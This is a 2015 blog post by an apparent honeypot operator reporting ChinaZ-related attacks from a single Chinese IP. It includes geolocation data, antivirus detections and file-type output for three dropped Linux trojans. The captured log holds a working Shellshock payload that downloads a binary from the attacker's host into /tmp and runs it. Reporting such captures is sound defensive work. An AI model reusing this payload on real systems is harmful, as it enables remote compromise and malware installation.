Montag, 13. Juli 2015

Multiple ChinaZ related attacks - 211.147.2.192

Yesterday, my honeypot was hit by several ChinaZ related attacks.

{"message":"Jul 13 06:38:52 localhost [mypyfwa] 2015-07-13 06:38:52.540616 211.147.2.192 - - [12/Jul/2015:20:48:02 +0200] \"GET / HTTP/1.1\" 404 442 \"() { :; }; /bin/bash -c \\\"rm -rf /tmp/*;echo wget http://211.147.2.192:911/1122.64 -O /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\\\"\" \"() { :; }; /bin/bash -c \\\"rm -rf /tmp/*;echo wget http://211.147.2.192:911/1122.64 -O /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\\\"\" 211.147.2.192 CN SHELLinjection","@version":"1","@timestamp":"2015-07-13T04:38:52.586Z","type":"syslog","file":"/var/log/smsids.log","host":"beeswarm","offset":"26328","tags":["_grokparsefailure"],"syslog_severity_code":5,"syslog_facility_code":1,"syslog_facility":"user-level","syslog_severity":"notice"}

All attacks were originated from the same source IP:
  •  211.147.2.192
"ip": "211.147.2.192",
   "subnets": [
      {
         "categoryDescriptions": {},
         "cats": {},
         "created": "2012-03-22T07:26:00.000Z",
         "geo": {
            "country": "China",
            "countrycode": "CN"
         },
There were three different files within the attacks
  •  ./1122.32: Linux.Trojan.IptabLex FOUND
  • ./1122.64: Linux.Trojan.IptabLex FOUND
  • ./8uc: Unix.Trojan.DDoS_XOR-1 FOUND
pi@raspberrypi ~/ana $ file 1122.32
1122.32: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically li            nked, for GNU/Linux 2.6.9, not stripped
pi@raspberrypi ~/ana $ file 1122.64
1122.64: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked,  for GNU/Linux 2.6.9, not stripped
pi@raspberrypi ~/ana $ file 8uc
8uc: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked , for GNU/Linux 2.6.9, not stripped